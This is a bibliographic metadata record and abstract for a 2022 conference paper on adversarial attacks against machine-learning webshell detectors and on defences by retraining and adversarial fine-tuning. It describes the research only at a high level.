{"title":"Adversarial Attack and Defense for Webshell Detection on Machine Learning Models","authors":"Q. Zhang, Lishen Chen, Qiao Yan","doi":"10.1109/CyberC55534.2022.00017","DOIUrl":null,"url":null,"abstract":"Machine learning (ML) models can be used for the automated processing and analysis of source codes, thus improving the detection of webshell malware source codes, which can enhance the security of the whole network. However, despite the successes of ML-based models in webshell detection, these models lack large amounts of data for training and are vulnerable to adversarial examples. We have built a larger and more precise dataset containing 2015 manually labeled webshell malware. A detection model trained with this dataset can achieve higher detection accuracy. We have also proposed a method to generate adversarial examples for the programming language without changing its logic. The main idea of our method is to insert perturbation codes that do not modify the webshell program’s semantics, thereby creating an adversarial example that can bypass the model’s detection. This method can effectively attack the existing webshell malware ML detection models without changing the original malicious functions. Experiments have shown that our method can generate webshell malware adversarial examples that evade model detection while obtaining the model’s confidence output. To defend against such attacks, we have applied retraining and adversarial fine-tuning.","PeriodicalId":234632,"journal":{"name":"2022 International Conference on Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC)","volume":"59 1","pages":"0"},"PeriodicalIF":0.0000,"publicationDate":"2022-10-01","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":"0","resultStr":null,"platform":"Semanticscholar","paperid":null,"PeriodicalName":"2022 International Conference on Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC)","FirstCategoryId":"1085","ListUrlMain":"https://doi.org/10.1109/CyberC55534.2022.00017","RegionNum":0,"RegionCategory":null,"ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":null,"EPubDate":"","PubModel":"","JCR":"","JCRName":"","Score":null,"Total":0}
引用次数: 0
Abstract
Machine learning (ML) models can be used for the automated processing and analysis of source codes, thus improving the detection of webshell malware source codes, which can enhance the security of the whole network. However, despite the successes of ML-based models in webshell detection, these models lack large amounts of data for training and are vulnerable to adversarial examples. We have built a larger and more precise dataset containing 2015 manually labeled webshell malware. A detection model trained with this dataset can achieve higher detection accuracy. We have also proposed a method to generate adversarial examples for the programming language without changing its logic. The main idea of our method is to insert perturbation codes that do not modify the webshell program’s semantics, thereby creating an adversarial example that can bypass the model’s detection. This method can effectively attack the existing webshell malware ML detection models without changing the original malicious functions. Experiments have shown that our method can generate webshell malware adversarial examples that evade model detection while obtaining the model’s confidence output. To defend against such attacks, we have applied retraining and adversarial fine-tuning.